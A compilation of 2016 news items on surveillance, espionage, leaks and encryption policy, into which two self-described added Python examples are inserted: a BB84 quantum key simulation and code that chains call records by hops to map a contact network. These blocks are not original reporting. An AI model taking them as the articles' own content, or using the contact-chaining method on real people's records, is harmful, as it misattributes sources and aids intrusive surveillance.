Azerbaijani Anti-Armenia Team of hacktivists leaked Armenian security service data and passport details of foreign visitors to Armenia.
A group of Azerbaijani hacktivists has leaked the passport details of foreign visitors to Armenia.

The data breach exposed internal resources of the Security Service (SNS) that are involved in updating information about foreign visitors’ passports.

The hackers breached Armenian government servers stealing sensitive data, including passport scans. Intelligence experts who analyzed the data leaks confirmed their authenticity.

The Anti-Armenia Team took credit for a series of data leaks that the hackers claim were stolen from servers of the Armenian national security ministry.

“We would like to notice that Anti – Armenia team is an independent group, who is active for five years and repeatedly makes anxious Armenian side by its cyber attacks,” the group explained to El Reg.

Armenia and Azerbaijan are neighbouring countries that fought a war over the disputed Nagorno-Karabakh region between 1988 and 1994.

There is great tension between the two countries: in April, the Azerbaijani army tried to regain control of the Nagorno-Karabakh Republic, and the fighting caused the deaths of 350 people.

A source who spoke to El Reg on condition of anonymity said the leaked information is more likely to have come from an insider, ruling out that the alleged Anti-Armenia team hacked Armenian government systems.

“I am familiar with the incident, and [can] confirm, that such attacks really happened, and the documents are legitimate and not fake,” the source told El Reg. “I have more confidence that one of their employees having access to it has been compromised and technical border control service is a part of SNS (Security Service), that’s why there is such overlap, and the documents could be stolen from particular person, and not ‘systems’, like they claim.”


China Launches World's 1st 'Hack-Proof' Quantum Communication Satellite
16.8.2016 thehackernews BigBrothers
China has taken one more step forward towards achieving success in Quantum communication technology.
China launched the world's first quantum communications satellite into orbit aboard a Long March-2D rocket earlier today, in order to test the fundamental laws of quantum mechanics in space.
'Hack-Proof' Communications System
The satellite, dubbed Quantum Science Satellite, is designed to develop a 'hack-proof' communications system for this age of global electronic surveillance and cyber attacks, by transmitting uncrackable encryption keys from space to the ground.
The 600-plus-kilogram Quantum Science Satellite, better known as Quantum Experiments at Space Scale (QUESS) satellite, took off from the Jiuquan Satellite Launch Center in Gobi Desert at 1:40 AM local time on a 2-year mission on Tuesday.
The QUESS satellite will help China perform unprecedented levels of experiments in quantum communication by sending entangled photons from the satellite to relay stations in China and Europe, which are separated by about 1,200 kilometers (746 miles).
The pioneering experiment is to test if the spooky property of quantum entanglement can work at long distances as well.
The satellite's payloads include:
Quantum key communicator
Quantum entanglement emitter
Quantum entanglement source
Quantum experiment controller
Processor
Laser communicator
The payloads, designed to operate for two years, were developed by the National Space Science Center in Beijing under the Chinese Academy of Sciences.
The QUESS satellite will also test the possibilities of communication via quantum 'teleportation,' using an entangled pair of photons.
If the satellite is able to successfully transmit quantum information securely between two ground stations, it could have huge implications for encryption and cryptography.
China has long been ambitious about quantum technology. For the past two decades, quantum technology has been a top strategic focus in the country's 5-year economic development plans.
While the United States invested about $200 Million a year in quantum research, China spent $101 Billion in quantum physics in 2015, up from $1.9 Billion in 2005.
China Invests Billions of Dollars in Quantum Technology
Quantum communication encryption is secure against any kind of interception because information is encoded in a quantum particle in such a way that it is destroyed as soon as the system detects an intrusion attempt.
For example, when two people share an encrypted quantum message and a third person intercepts it, the message will change in an unpredictable way.
Quantum researchers have recently experimented with using photons to communicate securely over short distances on Earth.
If successful, the QUESS satellite would vastly expand the range of unhackable communication to long distances as well.
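The "message changes in an unpredictable way" property above is what lets the two parties notice an eavesdropper. The following is an added example, not code from the article or the QUESS project: a classical simulation of the BB84 key-distribution protocol in which measuring a photon in the wrong basis yields a random bit, so an intercept-and-resend eavesdropper raises the error rate Bob observes from zero to about 25%. The abort threshold, the photon count and the seeded generator are assumptions for the demo.

```python
"""Why an intercepted quantum key is noticed: a BB84 simulation.

Added example, not from the article or the QUESS project. It models the
principle the article describes (measuring a photon in the wrong basis
disturbs it) with a classical simulation, and reports the error rate Bob
sees with and without an intercept-and-resend eavesdropper.
"""
import random

# Assumed abort threshold for the demo: an intercept-resend attack on every
# photon produces about 25% errors, so anything well below that is "clean".
QBER_THRESHOLD = 0.11


def bb84_run(n_photons: int, eavesdrop: bool, rng: random.Random) -> dict:
    """Simulate one BB84 session and return the sifted keys and error rate.

    basis 0 = rectilinear, 1 = diagonal. Measuring in the basis the photon
    was prepared in returns its bit; measuring in the other basis returns a
    uniformly random bit and leaves the photon prepared in the new basis.
    """
    alice_bits = [rng.getrandbits(1) for _ in range(n_photons)]
    alice_bases = [rng.getrandbits(1) for _ in range(n_photons)]
    bob_bases = [rng.getrandbits(1) for _ in range(n_photons)]

    bob_bits = []
    for bit, basis, b_basis in zip(alice_bits, alice_bases, bob_bases):
        if eavesdrop:
            # Eve guesses a basis, measures, and resends in HER basis, so a
            # wrong guess both gives her a random bit and disturbs the photon.
            e_basis = rng.getrandbits(1)
            bit = bit if e_basis == basis else rng.getrandbits(1)
            basis = e_basis
        bob_bits.append(bit if b_basis == basis else rng.getrandbits(1))

    # Sifting: Alice and Bob publicly compare bases and keep matching positions.
    keep = [i for i in range(n_photons) if alice_bases[i] == bob_bases[i]]
    key_a = [alice_bits[i] for i in keep]
    key_b = [bob_bits[i] for i in keep]
    # For the demo the error rate is computed over the whole sifted key; a
    # real protocol sacrifices and compares only a random sample of it.
    errors = sum(a != b for a, b in zip(key_a, key_b))
    qber = errors / len(key_a) if key_a else 0.0
    return {"sifted_bits": len(key_a), "qber": qber,
            "abort": qber > QBER_THRESHOLD, "key_a": key_a, "key_b": key_b}


if __name__ == "__main__":
    for eve in (False, True):
        r = bb84_run(4000, eve, random.Random(2016))
        print(f"eavesdropper={eve}: sifted={r['sifted_bits']} "
              f"QBER={r['qber']:.3f} abort={r['abort']}")
```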
"The newly-launched satellite marks a transition in China's role - from a follower in classic information technology development to one of the leaders guiding future achievements," Pan Jianwei, the scientist who is leading the project, told the official Xinhua news agency.
If successful, the QUESS satellite would be the world's first transcontinental quantum key distribution network of its kind and China hopes to erect a global quantum communications network in 2030.
"If China is going to send more quantum communication satellites into orbit, we can expect a global network of quantum communications to be set up around 2030," Pan added.


FBI 'Double Agent' Pleads Guilty to Selling 'Classified Information' to China
2.8.2016 Source: thehackernews.com BigBrothers
An FBI electronics technician has pleaded guilty to acting as a Chinese secret agent and passing along sensitive information about the Feds to a Chinese government official.
Kun Shan "Joey" Chun, 46, admitted in federal court in Manhattan on Monday that he violated his security clearance on several occasions between 2011 and 2016 in an effort to pass on secret information to China in exchange for money.
Chun is a 19-year FBI veteran from Brooklyn who was born in China but was employed by the FBI in 1997. His duties with the FBI included "accessing sensitive and, in some instances, classified information."
The g-man, as a double agent, sent confidential government information – including the identity and travel plans of an FBI special agent, the internal structure of the FBI and spying technology used by the Bureau – to a Chinese official.
Chun, who was initially arrested in March, got a top secret security clearance in 1998; at the time he did not reveal that he had ties to China.
A court document unsealed on Monday stated Chun had built relationships with associates in China since 2006 and had ties to China-based Zhuhai Kolion Technology Company and one individual who described himself as a Chinese government official.
Chun acted as a double agent – working both for the FBI and China – and began passing sensitive information to the Chinese official between 2011 and 2016.
In addition, Chun had long-standing and illegal ties to China-based Zhuhai Kolion Technology Company, for which he did research and consulting work, including collecting information about flash drive tech.
In exchange for his research, Chun received paid vacations and nights with prostitutes from Zhuhai Kolion Technology, and his parents were given money, officials said.
Preet Bharara, Manhattan’s top prosecutor, said the crime "betrays our nation and threatens our security. When the perpetrator is an FBI employee, like Kun Shan Chun, the threat is all the more serious and the betrayal all the more duplicitous."
Chun was caught by a fellow FBI undercover agent, who posed as a contractor for the Department of Defense (DoD) in a 2015 sting operation.
The techie fell for the trap and recruited the agent to pass on "sensitive information to his Chinese associates," in exchange for a cut of any profits.
The maximum sentence for Chun's criminal charge is ten years behind bars. He was released on bail following the court hearing. He is scheduled to be sentenced on 2 December.


Telephone metadata by NSA can reveal deeply personal information
20.5.2016 BigBrothers

A study conducted by the NSA confirms that telephone metadata from phone logs reveals individuals’ Personal Information to government surveillance agencies.
It has been argued in the past that the mass collection of phone records by government surveillance agencies poses a significant threat to privacy rights. Now a new study confirms what privacy advocates have been arguing for years: US researchers who used basic phone logs were able to identify individuals and access their confidential information.

All of these personal details were derived from anonymous “metadata” on individuals’ calls and texts. The two Stanford University scientists who conducted the research were able to figure out individuals’ names, where they lived and whom they associated with.

But that’s not all they found.

They also uncovered details such as gun ownership, medical and disability information and activities involving recreational drugs. When the results were paired with public information already available on services such as Yelp, Google and Facebook, a much bigger, more detailed picture of a given individual’s life emerged.

Former general counsel at the US National Security Agency (NSA), Stewart Baker has said that, “metadata absolutely tells you everything about somebody’s life.”

“For the study, the researchers signed up 823 people who agreed to have metadata collected from their phones through an Android app. The app also received information from their Facebook accounts, which the scientists used to check the accuracy of their results. In all, the researchers gathered metadata on more than 250,000 calls and over 1.2m texts,” reads an article published by The Guardian.

“Analysts who logged into the NSA’s metadata gathering system were initially allowed to examine data up to three hops away from an individual. A call from the target individual’s phone to another number was one hop. From that phone to another was two hops. And so on. The records available to analysts stretched back for five years. The collection window has now been restricted to two hops and 18 months at most.”

Alarmingly, the Stanford study revealed that, given just one phone number to start with, the NSA program would have had access to telephone metadata for tens of millions of people. With the current restrictions in place the number plummets, but it still indicates that, armed with just one phone number, it is possible to retrieve metadata on 25,000 people.
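The "hops" rule described above is a breadth-first walk over a contact graph built from call records, and the retention window is a filter on those records. The following Python is an added example, not code from the article or from the Stanford study: it builds a contact graph from a small set of constructed call-detail records (placeholder numbers, not real subscribers), counts how many numbers fall within one, two and three hops of a seed number, and shows how an 18-month window trims the result. The helper names and the 30-day month approximation in `retention_cutoff` are assumptions of this example.

```python
from collections import defaultdict, deque
from datetime import date, timedelta

# Constructed call-detail records (caller, callee, call_date).
# The numbers are placeholder strings, not real subscribers.
CDRS = [
    ("555-0100", "555-0101", date(2016, 1, 10)),
    ("555-0102", "555-0100", date(2016, 2, 1)),
    ("555-0101", "555-0103", date(2015, 12, 5)),
    ("555-0101", "555-0104", date(2016, 3, 15)),
    ("555-0105", "555-0102", date(2016, 1, 20)),
    ("555-0103", "555-0106", date(2016, 2, 14)),
    ("555-0105", "555-0107", date(2012, 6, 30)),  # old call, outside an 18-month window
    ("555-0200", "555-0201", date(2016, 1, 1)),   # unrelated pair, never reached
]


def build_contact_graph(cdrs, since=None):
    """Undirected contact graph: a call in either direction links both parties.
    Records dated before `since` are dropped, modelling a retention window."""
    graph = defaultdict(set)
    for caller, callee, when in cdrs:
        if since is not None and when < since:
            continue
        graph[caller].add(callee)
        graph[callee].add(caller)
    return graph


def contacts_within(cdrs, seed, hops, since=None):
    """Every number reachable from `seed` in at most `hops` hops (seed excluded).
    Breadth-first search, so each number gets its minimum hop distance."""
    graph = build_contact_graph(cdrs, since)
    seen = {seed}
    frontier = deque([(seed, 0)])
    while frontier:
        number, depth = frontier.popleft()
        if depth == hops:
            continue
        for peer in graph[number]:
            if peer not in seen:
                seen.add(peer)
                frontier.append((peer, depth + 1))
    seen.discard(seed)
    return seen


def retention_cutoff(today, months):
    """Earliest date still inside a retention window of `months` months
    (30-day months, an approximation used only for this example)."""
    return today - timedelta(days=30 * months)


def upper_bound_reach(avg_contacts, hops):
    """Rough upper bound on distinct numbers within `hops` hops when every number
    has `avg_contacts` distinct contacts and the contact sets never overlap."""
    return sum(avg_contacts ** h for h in range(1, hops + 1))


if __name__ == "__main__":
    seed = "555-0100"
    for h in (1, 2, 3):
        print(h, "hop(s):", sorted(contacts_within(CDRS, seed, h)))
    cutoff = retention_cutoff(date(2016, 5, 20), 18)
    print("3 hops, 18-month window:", sorted(contacts_within(CDRS, seed, 3, since=cutoff)))
    print("bound with 100 contacts each, 2 hops:", upper_bound_reach(100, 2))
```

The constructed graph is tiny, so the hop counts stay small; `upper_bound_reach` shows the combinatorial growth that turns one seed number into a population-scale query on a real call graph, and the window filter shows why shortening retention shrinks the reachable set.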

Patrick Mutchler, a computer security researcher at Stanford, writing in the journal Proceedings of the National Academy of Sciences, goes over some key points:

A wealth of personal information was disclosed, some of it sensitive, about people who took part in the study.
“Through automatic and manual searches, they identified 82% of people’s names.”
This same technique revealed the names of businesses those individuals had contacted.
When plotted on a map, clusters of local businesses appeared, which the scientists predicted would be located near the given individuals’ home addresses.
“In this way, they named the city people lived in 57% of the time, and were nearly 90% accurate in placing people within 50 miles of their home.”
The scientists were eventually able to determine relationships based on analyzing individuals’ call patterns. Following that, they “gathered details on calls made to and from a list of organisations, including hospitals, pharmacies, religious groups, legal services, firearms retailers and repair firms, marijuana dispensaries, and sex establishments. From these, they pieced together some extraordinary vignettes from people’s lives.”

Mutchler hopes these findings will give legislators pause with regard to authorizing mass surveillance programs: “Large-scale metadata surveillance programs, like the NSA’s, will necessarily expose highly confidential information about ordinary citizens,” he wrote. Mutchler went on to write: “To strike an appropriate balance between national security and civil liberties, future policymaking must be informed by input from relevant sciences.”

Similarly, Ross Anderson, professor of security engineering at Cambridge University argues that the study presents data that discussions can now be based on, saying: “With the right analytics running over nation-scale comms data you can infer huge amounts of sensitive information on everyone. We always suspected that of course, but here’s the data.”


Twitter closes intelligence agencies’ access to its analysis service
10.5.2016 BigBrothers

Twitter has blocked the US intelligence agencies from accessing a service that allows the real-time analysis of the content posted online.
According to The Wall Street Journal, that cited a senior US intelligence official, Twitter has blocked US intelligence agencies from accessing a service that analyzes the content posted online through the social media platform in real time.

“Twitter Inc. cut off U.S. intelligence agencies from access to a service that sifts through the entire output of its social-media postings, the latest example of tension between Silicon Valley and the federal government over terrorism and privacy,” states The Wall Street Journal.

The social media giant owns about a five percent stake in Dataminr, the only service allowed to access the real-time stream of public tweets.

Twitter is banning third-party companies from selling data to intelligence agencies for surveillance. After a pilot programme conducted through In-Q-Tel ended, the company told Dataminr that it will stop providing the service to the US Government. Dataminr has a $225,000 contract to provide its service to the Department of Homeland Security.

Dataminr implements a real-time engine for analysing tweets and discovering patterns among the content published through the social media platform. This kind of information is valuable for analysing threat actors and events of any kind, especially in investigations of terrorist organizations.

The decision was not publicly announced by Twitter, but executives at Dataminr recently confirmed Twitter’s intention to stop providing the service to the intelligence agencies.

Twitter told The Wall Street Journal in a statement that its “data is largely public and the US government may review public accounts on its own, like any user could.”

“Dataminr uses public Tweets to sell breaking news alerts to media organizations such as CNN and government agencies such as the World Health Organization, for non-surveillance purposes,” Twitter told IBTimes UK. “We have never authorized Dataminr or any third party to sell data to a government or intelligence agency for surveillance purposes. This is a longstanding policy, not a new development.”

What will happen in the future? Dataminr will continue to provide its services to the financial industry, news media and other clients outside the intelligence community.

Part of the security community believes that Twitter’s decision is aligned with the current policies of IT giants that intend to protect users’ privacy by avoiding interference from the intelligence agencies.

Right? Wrong? … posterity will judge.


2015 intelligence transparency report, the surveillance is still nosey
9.5.2016 BigBrothers

According to the 2015 intelligence transparency report, the searches of US citizens made by the NSA and CIA have almost doubled since 2013.
If you believe that Snowden’s revelations have stopped or limited surveillance activities, you are obviously wrong. The intelligence community has responded to the spread of technology and the growing threats of espionage and terrorism with a significant intensification of monitoring activities.

According to the 2015 transparency report on the use of national security authorities, US intelligence has ramped up searches of US citizens’ data.

The US intelligence agencies access information stored in a database that is fed with the data gathered by the surveillance machine managed by the NSA. Edward Snowden has leaked documents on powerful surveillance platforms such as XKeyScore, which is considered the “widest-reaching” architecture for developing intelligence from the internet.

Digging into the report, one finds that the number of surveillance queries concerning known US citizens is 4,672, almost double the figure declared in the 2013 transparency report.

The above number of surveillance queries includes the requests made by intelligence agencies such as the NSA and CIA, but not the FBI, which has no access to the database.

The intelligence transparency report also refers to more than 48,000 targets of National Security Letters. A National Security Letter (NSL) is defined as “a request for information that the Federal Bureau of Investigation (FBI) can make when they or other agencies in the Executive Branch of the U.S. government are conducting national security investigations. An NSL can’t be used in ordinary criminal, civil or administrative matters.”

The agencies query the database without a warrant, as specified in section 702 of FISA (“Procedures for Targeting Certain Persons Outside the United States Other Than United States Persons”).

The section highlights that “The government may not target any U.S. person anywhere in the world under this authority, nor may it target a person outside of the U.S. if the purpose is to acquire information from a particular, known person inside the U.S.”

“Section 702 only permits the targeting of non-U.S. persons reasonably believed to be located outside the United States to acquire foreign intelligence information. Such targets, however, may on occasion communicate information of or about U.S. persons. Where appropriate, NSA may disseminate such information concerning U.S. persons,” clarifies the report.

The 4,672 cases cited in the transparency report demonstrate that US intelligence has gathered and accessed data of US citizens without any warrant. Bear in mind, too, that the NSA and the CIA are in theory not supposed to conduct internal surveillance activities at all.

The report also identifies more than 48,000 targets of National Security Letters, a common business request that has also been criticized as unconstitutional.


Email Privacy Act – United States House Unanimously Passes Bill Demanding Warrants For e-mail, Cloud-based Data
3.5.2016 BigBrothers

Email Privacy Act: the House of Representatives passed a bill requiring authorities to obtain a court warrant before they can obtain email records.
On April 27, 2016, the United States House of Representatives unanimously passed a bill which requires that U.S. authorities obtain a court warrant before they can obtain e-mail records and data stored on cloud-based platforms.

By this move, the Email Privacy Act effectively overrides an existing law dating from the presidency of Ronald Reagan that permits authorities to obtain e-mail records and data from service providers without a search warrant as long as the message or data is at least 180 days (six months) old. The 1986 e-mail privacy law, enacted when CompuServe held sway, regarded cloud-stored e-mail and other documents older than six months as abandoned and therefore obtainable without a warrant.

Having been passed by the House, this new bill now proceeds to the Senate, where its likelihood of passage is somewhat uncertain. Recall that the U.S. Senate Judiciary Committee has for years deliberated and passed similar legislation which never saw the light of day. As usual, for this bill to become law, President Barack Obama must sign it. However, given that Mr. Obama leaves office in January 2017, it is doubtful he can sign the bill before his presidency runs out.

The bill approved on Wednesday was said to have been co-sponsored by more than 300 Representatives from both political parties. A proviso requiring that the target of the warrant be notified about it was expunged from the bill. Google and many other corporations already demand a warrant because of shifting guidance as to whether one is required.

Just as warrants are needed for physical papers and property, the bill stipulates that warrants are needed for all online documents, other private electronic documents and pictures. However, National Security Letters, of which hundreds of thousands have been issued so far, are exempted in the bill passed by the House.

United States government agencies such as the Securities and Exchange Commission (SEC) vigorously lobbied against the measure, preferring that it be dropped from the law. The SEC argued the stipulation would make its job of monitoring securities fraud very challenging. However, the House version did not yield to the SEC’s demands.

Privacy campaigners are said to be guardedly enthusiastic about the measure’s passage in the House of Representatives.

Sophia Cope, a staff attorney with the advocacy group Electronic Frontier Foundation (EFF), said: “while we applaud the passage of H.R. 699, the bill isn’t perfect. In particular, the Email Privacy Act doesn’t require the government to notify users when it seeks their online data from service providers, a vital safeguard ensuring users can obtain legal counsel to fight for their rights.” She went on to say: “however, companies may continue to provide notice to users of government requests—prior to compliance—something many companies commit to in our annual Who Has Your Back report.”

In conclusion, corporations such as Amazon and Yahoo amongst others supported the measure despite it not achieving “all of the reforms they anticipated.”


WhatsApp blocked for more than 100 million users due to a Judge’s order
3.5.2016 BigBrothers

A Brazilian judge has ordered access to the WhatsApp messaging service to be blocked for 72 hours, the second time in five months.
Brazilian authorities ordered ISPs to block WhatsApp today in a dispute over access to encrypted data. The order to block the messaging service for 72 hours was issued by a judge from the Brazilian state of Sergipe, and ISPs are obliged to comply with it or face fines.

According to the Brazilian newspaper Folha de S.Paulo the ban would begin at 2 p.m. local time and will impact more than 100 million Brazilian users.

Judge Marcel Montalvão, who is conducting a drug investigation, requested that WhatsApp provide access to its data.

“After cooperating to the full extent of our ability with the local courts, we are disappointed a judge in Sergipe decided yet again to order the block of WhatsApp in Brazil,” a WhatsApp spokesperson told TechCrunch. “This decision punishes more than 100 million Brazilians who rely on our service to communicate, run their businesses, and more, in order to force us to turn over information we repeatedly said we don’t have.”

The company refused, arguing that it cannot access the chat messages because it implements end-to-end encryption.

WhatsApp confirmed its position on the case in a message published by its CEO Jan Koum.

“Yet again millions of innocent Brazilians are being punished because a court wants WhatsApp to turn over information we repeatedly said we don’t have. Not only do we encrypt messages end-to-end on WhatsApp to keep people’s information safe and secure, we also don’t keep your chat history on our servers.” explained the CEO Jan Koum. “When you send an end-to-end encrypted message, no one else can read it – not even us. While we are working to get WhatsApp back up and running as soon as possible, we have no intention of compromising the security of our billion users around the world.”

He is the same judge who ordered the arrest of Facebook’s vice president for Latin America, Dzodan, in March; Dzodan’s lawyers clarified that WhatsApp makes its own decisions independently and that Dzodan could not force it to comply with the request.

This is the second time that the WhatsApp service has been banned in the country; it already happened in December 2015, when a 48-hour block was ordered and suspended after 12 hours.

How to avoid the ban?

Brazilian users can use VPN services to bypass the ban, and this is already happening in the country.


Brazil blocks WhatsApp for 72-Hours — Here's Why
3.5.2016 BigBrothers

For the second time in the past five months, a Brazilian court has ordered local telecommunications companies to block the popular messaging app WhatsApp for 72 hours, after the Facebook-owned WhatsApp refused to hand over information requested in a drug trafficking investigation. The WhatsApp shutdown is affecting more than 100 million users throughout the country. Moreover, if Brazilian telecommunications companies do not comply, they could face a fine of $143,000 per day.
Brazil just blocked its roughly 100 Million citizens from using WhatsApp, the popular messaging service owned by Facebook, for 72 hours (3 days).
A Brazilian Judge ordered the blackout after WhatsApp failed to comply with a court order asking the company to help a branch of civil police access WhatsApp data tied to a criminal investigation.
This is for the second time in last five months when a Brazil court ordered local telecommunications companies to block access to the popular messaging service across the country.
The ruling came into effect at 2 p.m. local time (1 p.m. ET), after which an estimated 91 percent of Brazilian mobile users nationwide were unable to send or receive any messages on WhatsApp, the local newspaper Folha de S.Paulo reported.
How to access WhatsApp in Brazil? Use Orbot app from Tor project.
Penalty of $142,000/Day for Not Complying
Moreover, any service provider found to be violating the court order will be subject to a penalty of $142,000 per day.
WhatsApp is very disappointed by the move, saying the decision "punishes more than 100 million users who depend upon us [WhatsApp] to communicate themselves, run their business and more, just to force us to hand over information that we do not have."
WhatsApp recently enabled complete end-to-end encryption for its text, image and voice messages, which means that even the company cannot access any message exchanged between users. This made matters even worse for the Brazilian police.
In December, a São Paulo state judge ordered the shutdown of WhatsApp across the country for 48 hours after Facebook failed to comply with a criminal investigation, although the court ruling was overturned by another court the next day.
The blackout comes courtesy of Judge Marcel Maia Montalvão of Sergipe state, the same judge who in March ordered the imprisonment of a Facebook executive for not turning over private data from a WhatsApp account tied to a drug trafficking investigation. He was jailed and subsequently released the next day.


FISA Court approved each and every request made by the government in 2015
2.5.2016 BigBrothers

According to a Justice Department memo, the FISA Court approved each and every request made by the government in 2015.
According to a Justice Department memo, the United States Foreign Intelligence Surveillance Act (FISA) Court approved each and every request made by the government in 2015. All of the 1,457 requests made last year by the NSA and FBI were approved. This was the case in 2014, as well. All 1,379 requests submitted were approved by the court. There was, however, a significant increase in requests that were modified by the court before they were approved: 80 applications were revised in 2015, as opposed to 19 in 2014.

Additionally, according to the report, the FBI sent out 48,642 national security letters (NSL) in 2015. NSLs are demands for information which include gag orders forbidding the recipient from disclosing the request.

The FISA Court is responsible for approving or denying electronic spying requests for use in foreign intelligence activities. It should be noted that the role of the court is to provide oversight, not to work in concert with the government.

Similarly, during the second half of 2015, government requests for Facebook to spy on its users increased 13% to 46,763. This is according to Facebook’s bi-annual transparency report. Included in the requests were personal data and messaging content from Messenger, WhatsApp, and Instagram.

Sixty percent of those requests for access to the data of Facebook users in the U.S. came with a non-disclosure order preventing Facebook from alerting the user to the fact that their personal data had been accessed and their communications were being monitored.

To make matters worse, the Department of Justice (DOJ) is one step closer to being authorized to remotely access computers anywhere in the world. According to TechDirt:

“The proposed amendments to Rule 41 remove jurisdiction limitations, which would allow the FBI to obtain a search warrant in, say, Virginia, and use it to ‘search’ computers across the nation using Network Investigative Techniques (NITs).

The DOJ claims the updates are needed because suspects routinely anonymize their connections, making it difficult to determine where they’re actually located. Opponents of the changes point out that this significantly broadens the power of magistrate judges, who would now be able to approve search warrants targeting any computer anywhere in the world.”

There has been no congressional opposition to the proposed amendments, with the exception of Sen. Ron Wyden (D-OR).

Meanwhile, National Intelligence chief James Clapper has been attempting to reverse all the progress made over the past couple years with encrypted communications. Clapper recently referred to encryption as “not a good thing.”

The encrypted communications market emerged in reaction to the government’s overzealous efforts to sidestep the 4th Amendment. The government inadvertently created what it is now trying to destroy.


The British GCHQ has disclosed dozens of vulnerabilities this year
1.5.2016 BigBrothers

The CESG, considered the information security arm of GCHQ, has disclosed more than 20 vulnerabilities affecting multiple software products this year.
The British intelligence agency GCHQ has disclosed more than 20 vulnerabilities affecting multiple software products. The information was shared by a GCHQ spokesperson with Motherboard.

The flaws were discovered by the CESG (Communications-Electronics Security Group), which is considered the Information Security Arm of GCHQ.

“So far in 2016 GCHQ/CESG has disclosed more than 20 vulnerabilities across a number of software products,” is the statement released by the GCHQ spokesperson to Motherboard.

Among the vulnerabilities disclosed by the CESG this year there is also a serious flaw in version 46 of the Firefox browser, a kernel vulnerability in OS X El Capitan v10.11.4, a couple of vulnerabilities in Squid, and two bugs in iOS 9.3.

Some of the bugs allow attackers to execute arbitrary code on the vulnerable devices.

“We are not always credited by vendors for bugs that we disclose. We ask companies for credit in bulletins that they may publish, but recognise that this is not always possible,” said a GCHQ spokesperson.

The disclosure of security flaws affecting products on the market is unusual for intelligence agencies and law enforcement, which usually exploit such flaws in their own hacking operations.

In August 2014, the BBC reported that the executive director of the Tor Project revealed that both US and UK intelligence agencies share bugs anonymously with Tor developers.

The information disclosed by Andrew Lewman in an interview with the BBC confirms the existence of groups of experts inside those organizations who anonymously leak information about Tor vulnerabilities so that the bugs get patched.

“There’s a lot of groundswell of support as to what is going on, but at the same time there’s the other half of the organization that is: ‘You know what? People shouldn’t have privacy,’ and ‘Let’s go out and attack these things,’” Lewman said. “So there is always a balance between those who protect our freedom and liberty and those who don’t want you to have it.”

Lewman confirmed that agency insiders ordinarily use Tor’s mechanism for anonymous bug submissions, which does not ask for any information from the researchers who report bugs in the Tor network.

“There are plenty of people in both organizations who can anonymously leak data to us to say maybe you should look here, maybe you should look at this to fix this,” Lewman said. “And they have.”


Wikileaks – NSA tapped world leaders for US geopolitical Interests
26.2.2016 BigBrothers

The NSA tapped world leaders for US Geopolitical Interests, including a conversation between Netanyahu-Berlusconi over the U.S.-Israel Relations.
A couple of days ago the non-profit journalistic organisation WikiLeaks published a collection of highly classified documents that reveals the NSA targeted world leaders for US Geopolitical Interests.

Some of the intercepts are classified TOP-SECRET COMINT-GAMMA; these are the most highly classified documents ever published by a media organization.

In particular, one of the documents reports eavesdropping activities conducted by US intelligence, which spied on communication between the German Chancellor Angela Merkel and UN Secretary-General Ban Ki-moon on climate change negotiations.

The agents of the National Security Agency have bugged a private climate change strategy meeting between the two politicians held in Berlin.

In June 2015, Wikileaks released another collection of documents on the extended economic espionage activity conducted by the NSA in Germany. The spies were particularly interested in the Greek debt crisis. US intelligence targeted German government representatives because of their privileged position in the negotiations between Greece and the EU.

Julian Assange, editor-in-chief at Wikileaks, released the following declaration on Wednesday:

“[it] further demonstrates that the United States’ economic espionage campaign extends to Germany and to key European institutions and issues such as the European Central Bank and the crisis in Greece.” “Would France and Germany have proceeded with the BRICS bailout plan for Greece if this intelligence was not collected and passed to the United States – who must have been horrified at the geopolitical implications?”

The new batch of classified documents also revealed espionage against the Chief of Staff of the UN High Commissioner for Refugees (UNHCR), an activity that US intelligence conducted for a long time, with the spies targeting his Swiss phone.

Also under the control of US intelligence was the Director of the Rules Division of the World Trade Organisation (WTO), Johann Human, but the most interesting cables for the Italian Government relate to the espionage against Prime Minister Silvio Berlusconi.

The interceptions were conducted by the Special Collection Service (SCS), a team of cyber spies operating under diplomatic cover in US embassies and consulates around the world. “Back in 2013, thanks to a Snowden document dated 2010, l’Espresso and la Repubblica revealed how Italy was the only European country, along with Germany, to have two Scs teams on its territory: one in Rome and the other in Milan,” reported an article published by the Italian L’Espresso.

The documents leaked by Wikileaks confirm that in March 2010 the US Government intercepted communications between the Italian Prime Minister and the Israeli PM Netanyahu; the information disclosed reveals that Berlusconi promised to help Israel mend its damaged relationship with the U.S.

The crisis between the United States and Israel was triggered by the announcement of Netanyahu’s plans to build 1,600 houses in East Jerusalem. Berlusconi offered his support to Israel in helping mend the situation.

According to these documents leaked by Assange’s organization, the NSA targeted all the members of Silvio Berlusconi’s staff, including his personal advisor Valentino Valentini, Berlusconi’s National Security Advisor Bruno Archi, Marco Carnelos, and the Permanent Representative of Italy to NATO, Stefano Stefanini.

In October 2011, the NSA also intercepted a top-secret/NOFORN document of Valentino Valentini’s.

The documents confirm that US intelligence also intercepted a critical private meeting between then French president Nicolas Sarkozy, Merkel and Berlusconi, where Sarkozy described the Italian banking system as ready to “pop like a cork.”

Which is the position of the Italian Government?

Many Italian security experts, myself included, are not surprised by these revelations. From the institutional perspective, it seems that the current Italian Government is ignoring these serious facts.

“The current Italian PM, Matteo Renzi, has essentially ignored the case, whereas the former Italian PM, Enrico Letta, speaking to the Chamber of Deputies in the midst of the most heated phases of the Nsa scandal, declared: «Based on the analysis conducted by our intelligence services and our international contacts, we are not aware that the security of the communications of the Italian government and embassies has been compromised, nor are we aware that the privacy of Italian citizens has been compromised»,” continues L’Espresso.

The Italian government has summoned the American ambassador to Rome following the embarrassing revelations.

The documents disclosed by Wikileaks also reveal other operations conducted by US intelligence, including the interception of the top EU and Japanese trade ministers.

“Today we proved the UN Secretary General Ban Ki-Moon’s private meetings over how to save the planet from climate change were bugged by a country intent on protecting its largest oil companies. Back in 2010 we revealed that the then US Secretary of State Hillary Clinton had ordered her diplomats to steal the UN leadership’s biometric data and other information. The US government has signed agreements with the UN that it will not engage in such conduct. It will be interesting to see the UN’s reaction, because if the United Nations Secretary General, whose communications and person have legal inviolability, can be repeatedly attacked without consequence then everyone is at risk.” said WikiLeaks editor Julian Assange.


GCHQ helped US in developing Stuxnet, claims a documentary
17.2.2016 BigBrothers

A new documentary titled Zero Days revealed that the Stuxnet cyber weapon was just a small part of a much bigger Information Warfare operation (code named “NITRO ZEUS”) against the Iranian civilian infrastructure.
A new documentary titled Zero Days has revealed more disconcerting news on the Stuxnet worm, the first malware recognized by the security industry as a cyber weapon. The documentary sheds light on the US war program that included the design of Stuxnet; it also reveals that hundreds of thousands of network implants and backdoors in Iranian networks were managed by Western entities in order to penetrate Iranian infrastructure and destroy it.

